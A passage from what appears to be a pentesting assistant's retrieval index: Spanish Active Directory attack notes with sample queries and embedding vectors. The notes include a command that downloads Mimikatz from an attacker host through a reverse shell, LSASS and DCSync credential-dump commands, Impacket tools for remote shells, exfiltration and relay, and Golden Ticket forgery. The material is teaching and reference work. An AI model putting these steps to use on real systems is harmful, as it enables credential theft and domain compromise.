-0.0044, 0.05098, 0.06566, 0.01889, 0.00398, -0.04376, -0.04747, -0.05688, -0.01534, 0.05008, -0.04828, 0.07785, -0.01643, 0.09374, 0.03509, 0.0219, -0.01009, 0.07378, 0.08847, -0.14133, 0.07055, 0.11784, -0.08926, 0.01444, -0.0158, 0.17641, 0.02702, 0.17613, -0.04124, 0.05132, 0.1303, -0.06333, 0.10835, -0.00726, 0.02853, -0.08228, -0.02376, 0.01821, 0.04078, -0.06563, 0.13983, -0.08011, -0.00553, -0.09663, -0.02714, -0.01476, -0.02479, 0.05572, 0.05383, 0.02065, 0.10312, 0.04187, 0.09346, -0.01607, 0.02206, 0.16042, -0.14547, 0.00067, 0.05549, 0.03246, -0.01676, -0.00939, -0.03171, -0.01872, 0.09078, 0.0019, 0.00909, -0.05956, -0.02719, -0.01136, 0.05629, 0.00358, -0.091, -0.03125, 0.03625, -0.02305, 0.05642, 0.06497, -0.08335, 0.2224, 0.12251, -0.04221, 0.08377, 0.03627, 0.03444, 0.12769, 0.03916, -0.11488, -0.08838, 0.1499, -0.00238, 0.09194, -0.03512, 0.02784, -0.05112, -0.05841, 0.06293, 0.02213, -0.08371, -0.03562, -0.11156, -0.0094, 0.05147, -0.03554, 0.1006, -0.01218, -0.11484, -0.01653, -0.09329, -0.00378, 0.01491, -0.01978, -0.11055, 0.0695, -0.08938, 0.01928, -0.00549, 0.06633, -0.00024, -0.08621, -0.04799, 0.01108, 0.0143, 0.02941, 0.01775, -0.09309, 0.15363, 0.04131, 0.04203, 0.01848, -0.03382, 0.03529, 0.05835, 0.02973, 0.00727, 0.00252, 0.07922, 0.01305, -0.01264, 0.01653, -0.05186, -0.05381, 0.05525, 0.03209, -0.0047, 0.05441, -0.0853, 0.01158, -0.02453, -0.02427, 0.02599, -0.07369, -0.06913, 0.07311, 0.09784, 0.0506, -0.03399, 0.00988, -0.03735, -0.04483, 0.02409, -0.03468, -0.04117, -0.06734, 0.02468, -0.01269, -0.09495, 0.01322, 0.02971, 0.00262, -0.05331, -0.04333, -0.04875, 0.03875, -0.04557, -0.00239, -0.02873, -0.0463, 0.04394, -0.01723, 0.01582, -0.04004, -0.05036, 0.00729, 0.04016, 0.01083, -0.1003, 0.06825, -0.02767, -0.00935, 0.07689, 0.1225, -0.02771, 0.05174, 0.01067, 0.10849, -0.0028, -0.04691, 0.02809, -0.03168, -0.07026, -0.05113, 0.02187, 0.00751, 0.03209, 0.01831, 0.00886, 0.01368, 0.10775, 0.01339, -0.07258, -0.07794, -0.02326, 0.0411, -0.00744, -0.00278, -0.05492, 0.02648, 0.00467, -0.02651, 0.04805, 0.01147, -0.0173, -0.03586, -0.02819, -0.0467, -0.05084, 0.04429, -0.08181, -0.06075, -0.08817, -0.00186, -0.02021, 0.04248, 0.0472, -0.03598, -0.01752, 0.02297, 0.02721, -0.05594, 0.01047, 0.01396]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Mimikatz\n\n**Es un .exe que se ejecuta DENTRO de la vΓ­ctima Windows.** No corre en Kali. Su trabajo: leer la memoria del proceso `LSASS` (que guarda credenciales en claro/hash mientras la sesiΓ³n estΓ‘ activa) y volcarlas.\n\n```\n tΓΊ (Kali) vΓ­ctima Windows\n ───────── ────────────────\n β”‚\n β”‚ 1. Levantas HTTP en tu carpeta de herramientas\n β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ 2. desde β”‚ PowerShell β”‚ iwr http://kali/mimikatz.exe -o m.exe\n β”‚ reverse β”‚ shell β”‚\n β”‚ shell ──► β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ β–Ό\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚ m.exe β”‚ privilege::debug\n β”‚ β”‚ β”‚ sekurlsa::logonpasswords\n β”‚ 4. ves ◄──── vuelca creds β”‚ lsadump::sam\n β”‚ hashes β”‚ del LSASS β”‚ lsadump::dcsync /user:Administrator\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "con que herramienta puedo volcar hashes de logones y dominio desde un proceso interno?", "v": [0.07298, -0.01015, -0.15265, -0.09422, -0.0269, -0.09813, 0.01432, -0.00333, -0.16662, -0.01909, -0.08069, -0.02904, -0.01856, -0.12138, 0.01747, 0.14111, 0.15224, -0.09519, -0.18721, -0.00831, -0.12927, 0.00059, -0.15292, 0.06018, 0.05477, -0.06726, 0.00095, -0.06104, -0.18658, 0.064, -0.04405, -0.06312, 0.06418, 0.042, -0.0797, -0.0979, -0.01917, 0.15233, 0.11273, 0.18206, -0.02154, 0.06492, -0.14883, 0.07871, -0.02666, -0.06839, -0.01247, -0.00675, 0.05936, -0.04111, 0.05139, -0.19256, -0.11256, 0.02834, 0.03484, -0.12616, 0.16964, -0.12247, 0.01963, -0.08029, -0.11606, 0.05971, -0.00755, 0.01322, -0.02565, -0.0175, 0.01128, -0.03263, -0.03636, 0.12913, -0.01483, 0.02382, 0.00804, -0.03625, 0.07736, -0.05183, -0.01556, 0.02256, 0.12132, 0.00407, 0.09823, 8e-05, -0.0416, -0.03511, -0.12018, -0.06888, -0.04703, -0.02656, 0.13982, 0.00999, 0.00441, 0.04559, -0.03398, -0.00378, -0.04917, 0.00299, 0.0317, -0.07044, -0.06844, -0.06982, 0.04929, 0.05537, -0.10506, 0.1133, 0.05891, 0.01255, -0.03817, -0.05006, 0.02331, -0.00677, 0.07643, -0.03218, -0.08639, -0.02155, -0.11994, 0.10763, -0.03345, -0.01555, -0.02696, -0.02756, -0.03137, -0.07294, 0.01576, 0.00516, 0.03753, -0.05282, -0.05024, 0.05774, -0.01925, -0.17347, 0.02541, 0.00596, -0.06409, 0.01101, 0.0036, 0.00952, 0.01245, -0.02696, 0.0316, -0.08805, 0.01604, 0.04022, -0.03128, -0.09381, 0.03729, 0.00109, -0.02954, -0.09808, -0.01224, -0.02979, -0.00278, -0.04956, -0.00026, 0.06341, -0.03877, 0.01134, -0.09329, -0.00926, -0.01285, -0.00146, -0.05242, -0.01335, 0.02082, 0.04747, -0.0053, -0.01382, 0.01096, -0.0862, 0.03867, 0.05686, -0.01169, -0.01177, 0.0239, -0.01239, -0.02556, -0.02606, -0.05472, -0.00625, -0.03328, -0.05816, -0.04354, -0.02269, 0.00227, -0.03791, 0.02682, 0.00987, 0.02087, -0.00431, 0.00611, 0.0151, 0.01552, 0.08343, -0.0193, -0.00935, -0.00491, 0.01059, -0.00755, -0.03231, 0.01091, -0.02313, -0.06689, -0.01993, 0.01562, -0.03124, 0.00341, 0.06066, -0.02924, -0.02133, 0.00283, -0.00907, 0.05551, 0.01918, 0.05958, 0.00607, -0.06444, 0.03572, -0.02501, 0.00177, -0.02644, -0.02495, 0.04754, 0.07141, 0.07703, 0.00696, -0.02703, 0.03383, 0.006, 0.05386, 0.03315, 0.00231, -0.01672, 0.02498, -0.02616, -0.03518, 0.05667, -0.01137, 0.05884, -0.03233, -0.07782, 0.01533, -0.0286, 0.07828, 0.02089, -0.01788, -0.07258, -0.07282, -0.05808, 0.04524, 0.00281, -0.0416, -0.0151, 0.00534, 0.02536, -0.02988, -0.04003, -0.02101]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Mimikatz\n\n**Es un .exe que se ejecuta DENTRO de la vΓ­ctima Windows.** No corre en Kali. Su trabajo: leer la memoria del proceso `LSASS` (que guarda credenciales en claro/hash mientras la sesiΓ³n estΓ‘ activa) y volcarlas.\n\n```\n tΓΊ (Kali) vΓ­ctima Windows\n ───────── ────────────────\n β”‚\n β”‚ 1. Levantas HTTP en tu carpeta de herramientas\n β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ 2. desde β”‚ PowerShell β”‚ iwr http://kali/mimikatz.exe -o m.exe\n β”‚ reverse β”‚ shell β”‚\n β”‚ shell ──► β””β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ β–Ό\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ β”‚ m.exe β”‚ privilege::debug\n β”‚ β”‚ β”‚ sekurlsa::logonpasswords\n β”‚ 4. ves ◄──── vuelca creds β”‚ lsadump::sam\n β”‚ hashes β”‚ del LSASS β”‚ lsadump::dcsync /user:Administrator\n β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```", "indexar": "cual es una alternativa libre a Mimikatz para extraer secretos del LSASS?", "v": [-0.05935, -0.04285, -0.07864, 0.08753, -0.06853, -0.04886, -0.22804, -0.15409, -0.23806, 0.06814, 0.00133, -0.13358, 0.02538, 0.04366, 0.28142, -0.14713, 0.1239, -0.00592, 0.09933, 0.04553, 0.05803, -0.0748, -0.16669, -0.07791, -0.01483, -0.08391, 0.10974, 0.02385, -0.06006, 0.04457, -0.09581, 0.05338, -0.09686, 0.01368, 0.08693, 0.02745, 0.10583, 0.09819, 0.11225, -0.06684, 0.15077, -0.02107, 0.00991, 0.08558, -0.02818, -0.09681, -0.03561, 0.00457, 0.07544, 0.00318, -0.07466, -0.03592, -0.04688, 0.02827, 0.00016, -0.06712, 0.06369, -0.03132, -0.18757, 0.07312, 0.02362, -0.10934, 0.01089, 0.01195, 0.04086, -0.08128, -0.03851, 0.03977, -0.03662, 0.07202, 0.02765, 0.05583, 0.09077, -0.04111, -0.10258, 0.06501, -0.03475, -0.01779, -0.00443, 0.04027, 0.00442, -0.00372, -0.02126, 0.11876, 0.02208, -0.04897, 0.01887, -0.09783, -0.08994, -0.03853, 0.04888, 0.02111, -0.01281, 0.09262, -0.05104, -0.02496, 0.03767, 0.10485, -0.02332, 0.09877, 0.01635, -0.02414, -0.14686, 0.11584, 0.00202, 0.00045, -0.02372, 0.00755, -0.03176, 0.02873, -0.02902, 0.05205, -0.03347, -0.02209, -0.0594, -0.02238, -0.04576, 0.06232, 0.00075, -0.02432, -0.04531, -0.02164, 0.03261, -0.07375, 0.01336, -0.06606, -0.036, 0.02384, -0.03556, 0.03802, 0.03424, 0.01945, 0.00924, -0.00781, 0.03281, -0.04022, 0.07302, -0.06669, -0.02976, -0.0358, -0.00886, -0.11954, 0.00927, 0.02027, 0.07364, -0.05251, -0.00518, 0.0076, 0.03572, -0.07756, -0.0954, 0.01874, 0.03936, 0.06541, -0.00184, 0.03582, -0.01316, 0.01722, -0.09072, 0.06872, 0.03744, -0.02364, -0.01363, -0.04671, -0.04179, -0.028, 0.02774, -0.04836, -0.10094, -0.00053, 0.03528, 0.01069, 0.04771, -0.04491, 0.06112, -0.03157, 0.04466, -0.01447, 0.03899, -0.02255, 0.0102, 0.07299, -0.04675, 0.02889, -0.0496, -0.027, 0.01231, 0.02116, -0.02028, -0.03216, -0.07442, -0.0162, -0.03355, -0.05012, -0.07054, 0.02672, 0.04429, -0.10965, 0.03104, -0.04886, -0.01964, 0.00761, 0.00119, -0.04975, -0.007, -0.02511, 0.00138, 0.01164, -0.00639, -0.015, 0.09895, -0.00845, 0.09109, -0.00619, -0.05533, 0.00485, -0.0441, -0.0189, -0.01096, -0.02466, -0.00745, 0.02578, 0.10339, -0.00066, 0.0564, 0.00646, 0.00559, 0.04571, -0.03098, 0.03205, -0.00158, 0.03983, 0.01754, 0.02945, 0.02953, 0.00761, -0.04229, 0.03859, 0.00503, -0.0137, 0.03799, 0.03367, 0.01083, -0.05805, 0.02442, -0.01689, -0.09059, 0.04061, -0.00693, -0.05863, 0.00042, -0.00269, 0.01485, 0.01069, 0.04671, -0.02281]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Impacket\n\n**Es una suite Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) **sin necesidad de ser Windows**. Es como tener un \"Windows hablante\" en tu Kali.\n\nLos mΓ‘s ΓΊtiles:\n\n```\nimpacket-psexec β†’ te da shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutas comandos sin tocar disco\nimpacket-smbexec β†’ otra forma de ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca todo el NTDS.dit y SAM de un DC, en remoto\nimpacket-GetUserSPNs β†’ ataque KERBEROASTING (saca TGS de cuentas de servicio)\nimpacket-GetNPUsers β†’ ataque ASREPROAST (usuarios sin pre-auth Kerberos)\nimpacket-getTGT β†’ forja/pide un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ monta un share SMB falso (para exfiltrar a Kali)\nimpacket-ntlmrelayx β†’ relay attacks NTLM\n```", "indexar": "cual es una suite para atacar protocolos Windows como SMB y Kerberos desde Kali?", "v": [-0.01801, -0.16441, 0.04717, 0.04614, -0.12414, -0.29293, 0.03051, -0.00511, -0.02971, -0.01544, -0.04893, -0.06479, 0.05173, -0.16094, 0.04048, 0.09192, -0.06428, -0.10445, 0.14797, 0.1112, 0.11964, 0.08591, 0.029, 0.02592, -0.05567, 0.01961, 0.10215, 0.02708, -0.04823, -0.07296, -0.10044, -0.01416, -0.00291, -0.07785, 0.09346, -0.01238, -0.11902, 0.15967, 0.03214, 0.08768, -0.03161, 0.03031, -0.02241, -0.00681, 0.06569, -0.05983, 0.06718, -0.02876, 0.14539, -0.04818, -0.00223, 0.09796, -0.072, -0.00642, -0.03135, -0.03224, 0.10193, -0.08583, -0.05719, 0.07799, -0.05593, 0.0385, -0.01679, -0.02728, 0.06386, -0.21276, 0.00431, 0.04202, -0.09004, 0.03277, -0.0613, 0.07499, 0.06233, 0.01621, 0.00458, 0.05776, -0.06961, -0.01878, 0.1084, 0.04382, 0.04315, 0.0125, -0.02351, 0.11185, -0.02524, -0.15368, 0.01545, -0.0889, -0.04377, -0.10066, 0.04986, -0.04594, -0.07425, 0.08524, 0.02935, -0.08487, 0.02058, 0.03069, 0.0312, 0.12142, -0.05054, -0.0669, -0.1564, 0.07002, -0.00089, 0.06648, -0.02816, -0.05081, 0.03832, -0.10812, -0.06094, 0.02005, 0.02055, -0.02533, -0.07207, -0.0291, -0.05675, -0.11046, -0.00404, -0.00396, -0.12098, 0.04034, -0.11046, -0.03301, -0.08134, -0.03601, -0.02043, 0.03576, -0.04725, -0.03105, 0.00858, 0.0511, -0.00325, 0.00097, -0.06948, 0.04373, -0.00405, -0.0597, -0.05777, -0.00614, 0.07136, 0.11004, 0.03075, 0.0397, 0.00923, 0.04211, 0.03621, 0.00447, -0.11211, -0.01131, 0.02928, 0.05803, -0.0275, 0.03548, -0.05093, -0.00902, -0.03937, 0.05092, 0.00627, 0.06877, -0.03468, 0.04005, -0.00557, 0.03382, 0.0563, -0.00992, -0.03696, -0.03649, 0.02777, -0.02343, 0.01221, 0.06668, -0.02731, -0.00809, 0.0177, -0.02209, 0.02657, -0.0442, -0.01353, -0.00713, -0.07643, 0.03067, -0.01724, 0.02682, -0.04132, -0.01438, 0.0248, 0.07928, 0.01738, -0.0081, -0.06103, -0.00296, 0.0463, -0.01174, -0.02985, -0.0318, -0.04038, -0.02242, 0.01623, 0.00474, -0.04716, 0.0143, -0.05473, -0.06953, 0.0555, 0.0663, -0.03925, -0.00906, -0.01836, 0.08113, 0.01172, 0.00022, 0.06243, -0.0215, -0.12617, -0.05802, 0.00995, -0.02617, 0.06895, 0.00836, 0.02414, 0.03597, 0.04984, -0.02187, -0.0238, -0.01153, -0.1287, -0.03647, -0.00487, -0.03651, -0.03412, 0.02628, 0.01493, 0.00125, 0.02262, 0.07187, 0.01152, -0.03244, -0.05501, -0.04538, -0.03232, 0.01092, -0.04331, -0.06853, -0.01487, -0.07137, -0.0761, -0.02662, -0.02879, -0.05558, 0.00894, 0.01973, 0.03242, 0.01315, -0.00809, -0.02892]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Impacket\n\n**Es una suite Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) **sin necesidad de ser Windows**. Es como tener un \"Windows hablante\" en tu Kali.\n\nLos mΓ‘s ΓΊtiles:\n\n```\nimpacket-psexec β†’ te da shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutas comandos sin tocar disco\nimpacket-smbexec β†’ otra forma de ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca todo el NTDS.dit y SAM de un DC, en remoto\nimpacket-GetUserSPNs β†’ ataque KERBEROASTING (saca TGS de cuentas de servicio)\nimpacket-GetNPUsers β†’ ataque ASREPROAST (usuarios sin pre-auth Kerberos)\nimpacket-getTGT β†’ forja/pide un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ monta un share SMB falso (para exfiltrar a Kali)\nimpacket-ntlmrelayx β†’ relay attacks NTLM\n```", "indexar": "que herramienta sirve para obtener shell remota en Windows sin ser nativo?", "v": [0.03307, -0.03161, -0.19957, -0.1316, 0.06791, -0.14401, -0.15794, -0.11976, 0.05606, -0.04903, -0.0667, -0.11325, 0.0987, -0.14199, 0.02962, 0.11566, -0.04063, -0.07324, -0.00407, 0.03461, 0.01165, -0.03269, -0.03708, -0.03105, -0.11617, 0.01808, 0.08974, 0.05138, -0.13789, 0.0278, 0.0805, -0.05372, 0.05687, -0.10167, -0.08693, 0.02787, -0.05822, 0.01855, -0.02641, 0.06354, 0.05368, 0.09053, -0.11031, 0.10657, 0.09782, -0.0122, 0.06079, -0.05076, 0.02294, 0.08703, -0.04151, -0.09885, -0.12594, -0.06378, 0.03547, -0.05685, 0.2467, -0.16426, 0.05355, -0.01682, -0.14644, 0.02048, -0.00595, -0.02371, -0.00123, -0.0587, -0.00392, -0.09759, -0.09089, 0.06165, -0.09029, 0.00905, 0.12058, -0.01325, 0.00014, 0.02403, -0.06741, 0.00017, 0.10828, -0.05431, 0.07102, -0.00683, -0.05643, -0.06732, -0.08659, -0.17803, 0.03921, -0.02935, 0.05842, -0.12998, 0.0047, 0.02191, -0.04484, 0.0647, 0.04029, -0.05826, -0.00377, -0.08121, -0.03583, 0.02751, 0.04716, -0.11261, -0.07329, 0.06986, -0.00417, 0.07522, -0.01656, -0.07531, -0.09057, 0.04404, 0.07683, 0.04059, 0.00746, 0.04274, -0.04068, 0.04481, -0.02639, -0.10354, 0.03729, 0.02558, -0.01061, 0.01514, -0.11453, 0.00075, -0.01711, -0.05217, -0.057, 0.05576, -0.03273, -0.04794, 0.04889, -0.01545, -0.05525, 0.00316, -0.08281, 0.01985, 0.02946, -0.1245, 0.0013, -0.08152, 0.0499, 0.06551, -0.01469, -0.05436, 0.07472, 0.03983, 0.06843, 0.01931, -0.02557, -0.0496, 0.01262, -0.08006, -0.04003, 0.03079, -0.10204, -0.03001, -0.02437, 0.06743, -0.00919, -0.01848, -0.03934, -0.07998, -0.00768, -0.02762, -0.00694, -0.07965, -0.00755, 0.00674, 0.08527, 0.03792, -0.03115, 0.05349, 0.03515, -0.04342, -0.02056, -0.01668, 0.02033, -0.00521, -0.02597, -0.0531, -0.08608, 0.02509, -0.02957, -0.08774, 0.02423, 0.02073, -0.00494, -0.00591, -0.041, -0.01509, -0.01342, -0.02039, 0.03252, -0.03559, 0.01182, 0.02571, -0.03912, -0.05532, 0.06232, 0.01274, -0.06861, 0.00074, 0.02745, -0.0409, 0.10437, 0.0657, -0.03252, 0.01757, 0.02004, 0.08585, -0.00747, 0.00959, -0.00422, -0.00486, 0.01933, -0.04526, 0.02563, -0.03573, -0.0324, 0.02309, -0.0092, -0.00262, 0.04584, 0.02573, 0.01148, 0.03422, -0.01708, 0.01094, -0.00146, -0.04608, 0.03536, -0.00742, 0.01534, 0.01904, 0.00064, -0.04656, 0.04097, -0.02983, -0.02284, -0.03018, -0.06109, 0.06658, -0.0058, -0.06406, -0.06687, -0.0378, -0.00251, -0.02339, -0.01933, -0.07672, -0.07315, 0.0029, 0.05547, -0.01199, -0.00138, 0.04466]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Impacket\n\n**Es una suite Python que corre en TU Kali**. Habla los protocolos de Windows (SMB, RPC, Kerberos) **sin necesidad de ser Windows**. Es como tener un \"Windows hablante\" en tu Kali.\n\nLos mΓ‘s ΓΊtiles:\n\n```\nimpacket-psexec β†’ te da shell en la vΓ­ctima si tienes creds (estilo PsExec)\nimpacket-wmiexec β†’ ejecutas comandos sin tocar disco\nimpacket-smbexec β†’ otra forma de ejecuciΓ³n remota\nimpacket-secretsdump β†’ vuelca todo el NTDS.dit y SAM de un DC, en remoto\nimpacket-GetUserSPNs β†’ ataque KERBEROASTING (saca TGS de cuentas de servicio)\nimpacket-GetNPUsers β†’ ataque ASREPROAST (usuarios sin pre-auth Kerberos)\nimpacket-getTGT β†’ forja/pide un TGT con cred conocida\nimpacket-getST β†’ pide un service ticket\nimpacket-smbserver β†’ monta un share SMB falso (para exfiltrar a Kali)\nimpacket-ntlmrelayx β†’ relay attacks NTLM\n```", "indexar": "con que programa puedo exfiltrar credenciales o montar shares falsos desde un servidor victimario?", "v": [0.08054, -0.0164, -0.15477, -0.05737, -0.0133, -0.0309, 0.07766, -0.09907, -0.03888, -0.14906, 0.09456, 0.03412, 0.07007, -0.06417, 0.07945, 0.08469, 0.07655, -0.12819, 0.09587, 0.02857, -0.0233, -0.04625, 0.08494, -0.16043, -0.04216, 0.07988, -0.03324, -0.04769, -0.00673, -0.07636, 0.15571, -0.02662, 0.07197, 0.0024, 0.12474, -0.04144, -0.10355, -0.01998, 0.04635, 0.08623, 0.18509, 0.05076, -0.06237, -0.0537, 0.06419, -0.04272, -0.11251, -0.06085, 0.01763, 0.02574, 0.02536, -0.06632, -0.1982, -0.07349, -0.04416, -0.08898, 0.04133, -0.16921, 0.11171, 0.00878, -0.07828, 0.04664, 0.05109, 0.01248, 0.03032, -0.02425, 0.05708, -0.01232, -0.10026, -0.0371, -0.08718, -0.02232, 0.03282, -0.07245, -0.04727, -0.05681, -0.00599, -0.02242, 0.03915, -0.00279, 0.02682, -0.05782, 0.07873, 0.13338, -0.03498, 0.01149, 0.01863, -0.07327, 0.01536, -0.05339, 0.06318, 0.09816, 0.01255, 0.05003, 0.0196, -0.0654, 0.14988, -0.0097, -0.01711, -0.00591, 0.07396, -0.03392, -0.03451, 0.13863, 0.03508, 0.09008, -0.01368, 0.005, -0.00797, -0.02755, 0.01499, 0.03059, -0.11708, -0.00938, -0.02408, -0.05909, 0.01319, 0.05319, 0.09821, 0.01615, -0.09503, -0.02055, 0.04833, 0.01945, 0.04851, -0.03222, 0.00512, 0.08057, -0.01679, -0.01733, -0.05535, 0.08971, -0.02399, -0.02735, -0.04053, -0.00829, 0.07388, -0.0701, -0.08249, -0.03972, 0.0515, 0.08537, -0.00417, -0.07948, 9e-05, -0.00591, 0.01855, -0.13085, -0.00513, -0.02213, 0.08637, 0.07037, 0.01563, 0.03895, -0.11908, -0.02239, 0.03273, -0.12257, 0.00961, 0.1164, 0.00705, 0.0179, -0.00458, 0.02357, 0.05048, -0.02338, 0.01688, -0.02708, 0.12734, 0.04299, -0.03145, 0.03735, 0.0395, -0.00765, 0.07061, 0.00998, -0.02618, -0.09957, 0.0221, -7e-05, -0.03079, 0.0169, 0.04637, 0.05707, -0.0543, -0.0706, -0.07645, 0.05164, 0.02209, 0.01814, 0.02873, -0.04576, -0.03336, 0.07031, 0.02054, -0.03445, 0.01082, 0.0007, 0.03325, -0.02071, -0.10508, 0.03666, -0.02132, -0.07009, 0.03025, 0.04605, -0.00457, 0.01184, -0.00163, 0.10426, 0.00606, -0.05405, 0.02455, -0.09553, -0.05095, -0.05067, 0.06553, -0.01737, 0.01034, 0.03162, -0.02649, 0.02995, 0.05629, 0.04908, -0.06795, -0.02608, -0.01311, 0.06323, 0.06186, 0.02511, -0.07732, 0.01127, -0.06289, -0.07476, 0.03757, 0.00098, 0.04205, 0.02625, -0.05391, -0.07379, -0.02358, 0.05697, 0.0087, -0.08983, 0.01158, 0.01276, -0.03017, 0.012, 0.0581, -0.03414, -0.03507, -0.01405, 0.01438, -0.0847, 0.02641, -0.09736]} +{"tipo": "pregunta", "herramienta": "apuntes-ad-pentest", "perfil": "PENTESTERS", "fichero": "conocimiento/apuntes-ad-pentest.md", "tema": "", "fuente": null, "licencia": null, "texto": "### Kerberos en 30 segundos\n\n```\n β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”\n β”‚ Usuario β”‚ ΒΏPwd? β”‚ KDC (Domain β”‚\n β”‚ (cliente)β”‚ ─────────────► β”‚ Controller) β”‚\n β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n β”‚ β”‚\n β”‚ ◄──── TGT (te identifica)β”‚\n β”‚ β”‚\n β”‚ TGT + \"quiero \\\\fileSrv\" β”‚\n β”œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β–Ίβ”‚\n β”‚ β”‚\n β”‚ ◄──── TGS (para fileSrv)β”‚\n β”‚ β”‚\n β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”‚\n └──────────►│ fileServerβ”‚ \"este TGS prueba que soy yo\"\n β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜\n```\n\n- **TGT** = \"carnet maestro\" del KDC. Lo guarda el cliente.\n- **TGS** = \"ticket de un dΓ­a\" para hablar con un servicio concreto.\n- **Trucos**: si pillas un TGT/TGS vΓ‘lido lo puedes **reutilizar** (pass-the-ticket). Si pillas el hash de `krbtgt` (la cuenta que firma TODOS los TGT) puedes forjar **Golden Tickets** = ser cualquiera, para siempre.\n\n---", "indexar": "que tΓ©cnica se usa para reutilizar un ticket sin saber la contraseΓ±a?", "v": [-0.15448, -0.10358, -0.25986, -0.13645, 0.04883, -0.1176, -0.11277, -0.11796, 0.09391, 0.00621, -0.14985, -0.0787, 0.03321, 0.0895, 0.00499, 0.02236, 0.12898, -0.0144, 0.26493, -0.0596, 0.04938, 0.00475, -0.00246, -0.01446, -0.07794, 0.01187, 0.07322, -0.08888, -0.11671, -0.07804, -0.01353, 0.01939, 0.06537, -0.06176, -0.02165, 0.12733, 0.10472, 0.08851, 0.06292, 0.0247, 0.00825, 0.05566, -0.17344, 0.1724, 0.04363, 0.02757, 0.05036, 0.06287, 0.08251, 0.00693, -0.04831, -0.01268, -0.10454, 0.00383, -0.00113, -0.12899, 0.08622, 0.01595, -0.00685, 0.00692, -0.09299, -0.08064, 0.00108, 0.1475, -0.07701, -0.03409, 0.05451, -0.03845, -0.05139, 0.02938, -0.01181, -0.02962, -0.00895, 0.04065, -0.07631, 0.09619, 0.08641, -0.03415, 0.09188, 0.05722, -0.05626, -0.0141, -0.01442, -0.0439, -0.01484, -0.03849, 0.09495, -0.00718, 0.0375, -0.06369, 0.03161, 0.01004, -0.02613, 0.01311, 0.04471, -0.04453, -0.04886, 0.00371, -0.12668, -0.01035, -0.00782, -0.07962, 0.0017, 0.04857, 0.03158, 0.04406, 0.01098, -0.04817, 0.01597, -0.00158, -0.02226, 0.06114, -0.11032, -0.03179, -0.10762, 0.01773, 0.03328, -0.07244, -0.01336, 0.09446, -0.01925, 0.0078, 0.06297, -0.06306, 0.06997, -0.02531, -0.0486, 0.09055, 0.01781, -0.0469, 0.044, 6e-05, -0.10816, -0.00333, -0.01389, 0.05445, -0.00209, -0.08656, -0.1081, 0.02102, -0.00643, 0.05144, -0.05305, 0.02557, 0.04773, 0.00449, 0.06132, -0.07213, -0.10773, -0.02933, 0.00899, 0.02451, 0.06325, 0.08593, 0.06544, 0.05603, 0.00092, -0.06, -0.03403, 0.06105, -0.06253, -0.0219, -0.00874, -0.00487, -0.07293, -0.01344, -0.0578, -0.05039, 0.00881, 0.04396, 0.03779, 0.03756, 0.01883, 0.03367, -0.00195, 0.00935, -0.04616, -0.01891, -0.01933, -0.11355, 0.02629, -0.04968, 0.01258, -0.03954, -0.01215, -0.06679, 0.04021, -0.01814, 0.00866, 0.00984, 0.02971, -0.01271, -0.01584, 0.04544, -0.0792, -0.0419, -0.06202, -0.08082, -0.04976, -0.02084, -0.00237, 0.0245, -0.01093, -0.04193, 0.05774, -0.01693, -0.04964, -0.06769, -0.01503, -0.00748, 0.03557, -0.03973, 0.02977, -0.02326, -0.03617, -0.05218, -0.04276, 0.03659, -0.04644, -0.01716, 0.07259, 0.04256, 0.01169, 0.00534, 0.01164, -0.06801, 0.01086, 0.04541, 0.00802, 0.00283, -0.04518, 0.07699, 0.0103, 0.01904, 0.10559, -0.01578, -0.04187, -0.07465, -0.06067, -0.04245, 0.00669, 